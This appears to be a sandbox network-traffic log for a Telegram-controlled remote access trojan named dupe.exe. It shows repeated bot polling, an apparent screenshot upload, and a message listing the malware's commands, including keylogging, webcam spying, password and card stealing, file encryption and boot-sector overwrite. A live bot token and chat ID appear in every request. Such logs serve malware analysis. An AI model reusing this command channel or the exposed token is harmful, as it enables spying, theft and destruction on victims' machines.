      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628336
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628336 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:38 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628337
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628337 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:39 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628338
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628338 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:40 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628339
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628339 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:42 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628340
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628340 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:43 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628341
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628341 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:44 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628342
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628342 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:45 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628343
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628343 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:46 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628344
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628344 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:47 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628345
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628345 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:49 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628346
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628346 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:50 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628347
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628347 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:51 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628348
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628348 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:52 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628349
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628349 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:53 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628350
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628350 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:54 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628351
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628351 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:55 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628352
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628352 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:56 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628353
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628353 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:57 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628354
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628354 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:58 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628355
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628355 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:21:00 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-nl
      GET
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628356
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      GET /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628356 HTTP/1.1
      Host: api.telegram.org
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:21:01 GMT
      Content-Type: application/json
      Content-Length: 23
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-us
      DNS
      220.167.154.149.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      220.167.154.149.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      209.205.72.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      209.205.72.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      157.123.68.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      157.123.68.40.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      18.31.95.13.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      18.31.95.13.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      172.214.232.199.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      172.214.232.199.in-addr.arpa
      IN PTR
      Response
    • flag-nl
      POST
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/sendPhoto?chat_id=5623362319
      dupe.exe
      Remote address:
      149.154.167.220:443
      Request
      POST /bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/sendPhoto?chat_id=5623362319 HTTP/1.1
      Content-Type: multipart/form-data; boundary="6d84e473-bc5f-441c-be87-e8f74faafc79"
      Host: api.telegram.org
      Content-Length: 425007
      Expect: 100-continue
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.18.0
      Date: Thu, 18 Jul 2024 13:20:40 GMT
      Content-Type: application/json
      Content-Length: 984
      Connection: keep-alive
      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
      Access-Control-Allow-Origin: *
      Access-Control-Allow-Methods: GET, POST, OPTIONS
      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
    • flag-us
      DNS
      73.144.22.2.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      73.144.22.2.in-addr.arpa
      IN PTR
      Response
      73.144.22.2.in-addr.arpa
      IN PTR
      a2-22-144-73deploystaticakamaitechnologiescom
    • flag-us
      DNS
      29.243.111.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      29.243.111.52.in-addr.arpa
      IN PTR
      Response
    • 13.107.21.237:443
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=b1a3fe9c6e444cd2ad72af8e475c30ab&localId=w:02CFF369-7177-605D-73C2-BA4DB418EA60&deviceId=6896204246996124&anid=
      tls, http2
      2.0kB
      9.3kB
      21
      19

      HTTP Request

      GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=b1a3fe9c6e444cd2ad72af8e475c30ab&localId=w:02CFF369-7177-605D-73C2-BA4DB418EA60&deviceId=6896204246996124&anid=

      HTTP Response

      204

      HTTP Request

      GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=b1a3fe9c6e444cd2ad72af8e475c30ab&localId=w:02CFF369-7177-605D-73C2-BA4DB418EA60&deviceId=6896204246996124&anid=

      HTTP Response

      204

      HTTP Request

      GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=b1a3fe9c6e444cd2ad72af8e475c30ab&localId=w:02CFF369-7177-605D-73C2-BA4DB418EA60&deviceId=6896204246996124&anid=

      HTTP Response

      204
    • 149.154.167.220:443
      https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628356
      tls, http
      dupe.exe
      23.1kB
      53.4kB
      178
      108

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/sendMessage?chat_id=5623362319&text=%F0%9F%8D%80%20Bot%20connected

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=1

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=2

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=3

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=4

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=5

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=6

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/sendMessage?chat_id=5623362319&text=%0A%20%F0%9F%8C%8E%20INFORMATION:%0A%20/ComputerInfo%0A%20/BatteryInfo%0A%20/Location%0A%20/Whois%0A%20/ActiveWindow%0A%0A%F0%9F%8E%A7%20SPYING:%0A%20/Webcam%20%3Ccamera%3E%20%3Cdelay%3E%0A%20/Microphone%20%3Cseconds%3E%0A%20/Desktop%0A%20/Keylogger%0A%0A%F0%9F%93%8B%20CLIPBOARD:%0A%20/ClipboardSet%20%3Ctext%3E%0A%20/ClipboardGet%0A%0A%F0%9F%93%8A%20TASKMANAGER:%0A%20/ProcessList%0A%20/ProcessKill%20%3Cprocess%3E%0A%20/ProcessStart%20%3Cprocess%3E%0A%20/TaskManagerDisable%0A%20/TaskManagerEnable%0A%0A%20/MinimizeAllWindows%0A%20/MaximizeAllWindows%0A%0A%F0%9F%92%B3%20STEALER:%0A%20/GetPasswords%0A%20/GetCreditCards%0A%20/GetHistory%0A%20/GetBookmarks%0A%20/GetCookies%0A%20/GetDesktop%0A%20/GetFileZilla%0A%20/GetDiscord%0A%20/GetTelegram%0A%20/GetSteam%0A%0A%F0%9F%92%BF%20CD-ROM:%0A%20/OpenCD%0A%20/CloseCD%0A%0A%F0%9F%92%BC%20FILES:%0A%20/DownloadFile%20%3Cfile/dir%3E%0A%20/UploadFile%20%3Cdrop/url%3E%0A%20/RunFile%20%3Cfile%3E%0A%20/RunFileAdmin%20%3Cfile%3E%0A%20/ListFiles%20%3Cdir%3E%0A%20/RemoveFile%20%3Cfile%3E%0A%20/RemoveDir%20%3Cdir%3E%0A%20/MoveFile%20%3Cfilr%3E%20%3Cfile%3E%0A%20/CopyFile%20%3Cfile%3E%20%3Cfile%3E%0A%20/MoveDir%20%3Cdir%3E%20%3Cdir%3E%0A%20/CopyDir%20%3Cdir%3E%20%3Cdir%3E%0A%0A%F0%9F%9A%80%20COMMUNICATION:%0A%20/Speak%20%3Ctext%3E%0A%20/Shell%20%3Ccommand%3E%0A%20/MessageBox%20%3Cerror/info/warn%3E%20%3Ctext%3E%0A%20/OpenURL%20%3Curl%3E%0A%20/SetWallpaper%20%3Cfile%3E%0A%20/SendKeyPress%20%3Ckeys%3E%0A%20/NetDiscover%20%3Cto%3E%0A%20/Uninstall%0A%0A%F0%9F%94%8A%20AUDIO:%20%0A%20/PlayMusic%20%3Cfile%3E%0A%20/AudioVolumeSet%20%3C0-100%3E%0A%20/AudioVolumeGet%0A%0A%F0%9F%92%A3%20EVIL:%0A%20/BlockInput%20%3Cseconds%3E%0A%20/Monitor%20%3Con/off/standby%3E%0A%20/DisplayRotate%20%3C0,90,180,270%3E%0A%20/EncryptFileSystem%20%3Cpassword%3E%0A%20/DecryptFileSystem%20%3Cpassword%3E%0A%20/ForkBomb%0A%20/BSoD%0A%20/OverwriteBootSector%0A%0A%F0%9F%92%A1%20POWER:%0A%20/Shutdown%0A%20/Reboot%0A%20/Hibernate%0A%20/Logoff%0A%0A%F0%9F%92%B0%20OTHER:%0A%20/Help%0A%20/About

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628332

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628333

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628334

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628335

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628336

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628337

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628338

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628339

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628340

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628341

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628342

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628343

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628344

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628345

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628346

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628347

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628348

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628349

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628350

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628351

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628352

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628353

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628354

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628355

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/sendMessage?chat_id=5623362319&text=%E2%9B%94%20Argument%20%3Cur%3E%20is%20required%20for%20/OpenURL

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628334

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628335

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628336

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628337

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628338

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628339

      HTTP Response

      200

      HTTP Request

      GET https://api.telegram.org/bot7074076538:AAGqOb5C3l0YTijTUMFzandCeulk-NFhSz0/getUpdates?offset=628628340

